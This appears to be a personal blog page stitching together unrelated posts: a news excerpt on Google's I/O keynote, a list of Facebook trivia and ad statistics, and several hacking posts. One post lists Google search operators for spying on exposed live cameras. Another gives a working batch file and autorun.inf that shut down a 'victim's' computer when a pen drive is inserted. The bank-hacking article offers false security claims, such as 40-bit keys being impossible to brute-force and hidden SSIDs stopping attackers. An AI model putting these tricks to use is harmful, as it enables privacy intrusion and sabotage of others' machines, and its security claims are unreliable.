Sunday, 12 August 2018

Google Strikes Humble Tone While Promoting A.I. Technology

Google’s annual conference for software developers is usually a celebration of technology, an event that highlights how tech advancements — no matter how mundane — are good for the world.
But in a year when some of its most popular products have been used to propagate misinformation, spread conspiracy theories and meddle with elections, Google struck a more measured tone on Tuesday. Speaking at this year’s Google I/O conference, Sundar Pichai, the company’s chief executive, said advancements in artificial intelligence had pushed Google to be more reflective about its responsibilities.
“There are very real and important questions being raised about the impact of these advances, and the role they will play in our lives,” Mr. Pichai said during his keynote speech. “We know the path ahead needs to be navigated carefully and deliberately. We feel a deep sense of responsibility to get this right"
ImageMr. Pichai was acknowledging the backlash facing Silicon Valley. Google has come under fire for its far-reaching data collection practices, its inability to tackle the deluge of problematic videos on YouTube and its occasional failures in keeping misinformation away from search results in the minutes after tragic events.

Thursday, 4 May 2017

21 most amazing fact about facebok


1. Al Pacino was the first “face” on Facebook . A very early iteration of the site displayed a header image featuring a man’s face obscured behind binary code. The identity of the man could not be seen clearly, but it later came to light that the face was that of acclaimed actor Al Pacino.

2. Peter Thiel, co-founder of PayPal, was the first major investor to back Facebook. Thiel, a luminary in the startup and venture capital worlds, saw the site’s potential and invested $500,000 into the young company in 2004. Thiel later sold his stake in the company for more than $1 billion.

3. Sean Parker, co-founder of now-defunct music sharing site Napster, originally acquired the facebook.com domain name for $200,000. Parker was the driving force in the renaming of the site, and was highly influential as the site exploded in popularity. (source )

4. A peer-to-peer file-sharing system called Wirehog was once a core function of Facebook. Mark Zuckerberg introduced the P2P file-sharing system when Thefacebook.com reached approximately 500,000 users, and once believed it would become a central component of the site. Wirehog was retired over fears of potential legal repercussions of copyright infringement in 2006. (source )

5. Mark Zuckerberg suffers from red-green colorblindness. This is why Facebook’s primary color scheme is blue – although it certainly doesn’t hurt that blue is also strongly associated with trust and security, two concepts essential in getting people to voluntarily part with their personal information. (source )

6. Facebook’s ‘Like’ button used to be the ‘Awesome’ button. Facebook engineer Andrew Bosworth said that he and other engineers were enthusiastic about the “Awesome” button, but that the idea was ultimately vetoed by Zuckerberg in 2007. The site eventually settled on the “Like” button, a decision that Bosworth said was met with a decidedly lukewarm reception. (source )

7. Facebook stores approximately 300 PETABYTES of user data on its servers. There are 1 million gigabytes in a petabyte. The entire written works of humankind, in every known language (including Latin and other historical languages) from the dawn of recorded history, would occupy approximately 50 petabytes . Think about that for a minute. ( source )

8. In 2014, the alleged global economic impact of Facebook was approximately $227 billion . However, this statistic (and the methodology behind it) has been called in question by several leading economists . Whether you buy Facebook’s data or not, there’s no doubt that Facebook has had a serious impact on economies around the world. (source )

9. Facebook’s user base grows by eight people per second, or 7,246 people every 15 minutes. Some naysayers have foretold of Facebook’s impending demise, but aside from boasting the largest user base of any social network in the world by a gigantic margin, this statistic proves Facebook is still growing. ( source )

10. In 2015, Facebook boasted 22% of WORLDWIDE mobile Internet advertising revenue.
That means almost one-quarter of all advertising revenue generated from mobile Internet ads in a single year went to Facebook. ( source )

11. Adult Facebook users in the United States spend 68% of their mobile device time using apps. Despite this, there were only approximately 8,400 app advertisers on Facebook in 2013 – and these 8,400 advertisers drove more than 145 million app installs in that year alone. (source )

12. There are now more than 2 million active advertisers on Facebook. The popularity, impact, and cost-effectiveness of Facebook ads has made the site one of the most popular online advertising platforms in the world, and its upward trajectory seems likely to continue. ( source )

13. Facebook ads targeting custom audiences have 14% lower cost-per-click and 64% lower cost-per-conversions than ads utilizing interest- or category-based targeting, on average. In addition, Facebook ads using custom audience targeting had conversion rates 387% higher than ads only using demographic targeting. (source )

14. The Facebook advertising format with the lowest cost-per-click is the Sponsored Page Action Story format, which has an average CPC of just $0.11. The ad format with the highest CPC is the Sponsored App Action Story, which has an average CPC of $0.58. ( source )

15. The Facebook advertising format with the highest click-through rate is the Sponsored Place Check-In Story, which has an average CTR of 3.2%. The ad format with the lowest CTR is the Inline Like format, which has an average CTR of 0.03%.

16. Facebook earns an average of $5.85 for every Facebook user in the United States and Canada. These two countries also have among the highest monthly active users of any country in the world, making North America a vitally important market for Facebook. ( source )

17. Every minute of downtime outage costs Facebook approximately $24,420. The “prolonged” outage that lasted for 19 minutes in August 2014 cost the company almost $427,000 – and you thought you were pissed when Facebook goes down. ( source )

18. Posts published between 10 p.m. and 11 p.m. EST receive approximately 88% more interactions on average than posts published at other times of the day. Also, ending posts with a question lifts interactions with those posts by an average of 162%. ( source )

19. In September 2014, Facebook users watched a collective 1 billion videos per day. Today, that figure is more than 4 billion – and 75% of these video views occur on mobile devices. ( source )

20. Videos are the most-shared content type on Facebook. On average, videos receive 89.5 shares per video, significantly higher share counts than photos or text-based posts. ( source )

    #thank you

Friday, 4 December 2015

Live Cameras Around The World

Go To Google And Search Any Of The Texts Given Below And Peep Through Live Cameras Around The World.

• inurl:”CgiStart?page=”

• inurl:/view.shtml* intitle:”Live View / — AXIS

• inurl:view/view.shtml

• inurl:ViewerFrame?Mode=

• inurl:ViewerFrame?Mode=Refresh

• inurl:axis-cgi/jpg

Thank you.
                            - Nilabh

How To Shutdown Computer Using Pendrive

Step 1:>>copy this  code into notepad:

@echo off
shutdown -s -t 00
Save as fun.bat extension (for eg: clickme.bat).

Step 2:
Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable
Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3:
Then copy the two files in your pen drive or victim's pen drive.
That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Thank you, may thise help you.
                                -Nilabh

How Hackers Hack Bank Accounts and Personal Information

I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL(Secured Sockets Layer) connection (to read more click here )and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information.
Below example will illustrate you how powerful the encryption method is:

40 bit encryption, means there are  2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption.
128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption.That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key.
That’s a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it’s all is useless to you once your system has been compromised or hacked.
Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information. Note : This is for educational purposes only( For more details read Disclosure).
Some of them are:

1. Phishing : We have discussed phishing on this website alot of times in tutorials like how to hack Gmail accounts password or hacking Facebook accounts and others too. But for new Guys I explain what is Phishing. Phishing is a technique to hack password and login details of a particular website using Phish pages. Now what are Phish pages? Phish Pages are simply the fake pages that looks the original webpage. The only difference between phish page and original page is the Address bar link (for normal user) and redirection post and get method( inside source for advanced users). How to identify a fake link? Just check the address bar URL for a fake page or Phish page it will be showing different URL than the original URL. Also if you want that everything is done automatically then install a Web security tool bar in your browser (AVG and Crawler web security tool bars are good choices) as it detects the phishing automatically and do not allows you to visit Phishing Pages.

2. Trojans: Trojans are type to viruses that steals your information. It can be in many forms like Keyloggers or RAT’s( remote administration tools). What a keylogger do is that it monitors all the keys that you have pressed from your physical keyboard and stores them in form of a log and send these details to hackers. RAT’s are advanced form of Keyloggers that remotely monitors all your activities where keylogger is simply a functionality. Using RAT hacker can connect to your system anonymously i.e. without your information when you are online. RAT’s have a huge list of functionality and these are best type of hacking tools available in the market. Now How you will protect yourself from Keyloggers? Just keep your antivirus updated and install Keyscramber that encrypts your keystrokes. Now why i haven’t mentioned RAT there is because once the RAT enters your system you cannot do anything other than formatting your system. So RAT’s attack only can be prevented before they enters in your system. For preventing from RAT’s Please do not download any software or cracks or keygens online. Also avoid downloading freewares from new websites use certified websites only like CNET, filehippo etc.. Also please avoid testing fake hack tools (recommended for hackers) because most hacking tools have keylogger and RAT’s attached to them. Test it under secured conditions like on Virtual Users. Means install virtual operating system user Virtual PC or Virtual Box and then test them there.

3. Session Hijacking: Most of us uses Wireless Networks to access the internet and data flow in form of packets and channels. And we know that Wireless are easier to hack as they have very weak encryption. So Hackers hack the wireless networks and using session Hijacking they take control of the internet data transfer and redirects the user from original path to their path. Means suppose you are visiting Google or Gmail or Facebook, then hacker when get access then he can redirect you to any of the page and capture you account details. Packet sniffing is another way to hack the account information and credentials using the wireless networks where Hackers captures packets and decrypt these encrypted information to get the information in form of plain text. Now how you will prevent this? Its also pity simple to prevent this, you need to hide you SSID and BSSID from being discovered by the other networks. Just leave the SSID or BSSID empty for that. Now hacker will not be able to discover your wireless router so he will not been able to hack it.

Thank you, hope thise will be able to help you in futer.
-Nilabh

Google Strikes Humble Tone While Promoting A.I. Technology

Google’s annual conference for software developers is usually a celebration of technology, an event that highlights how tech advancement...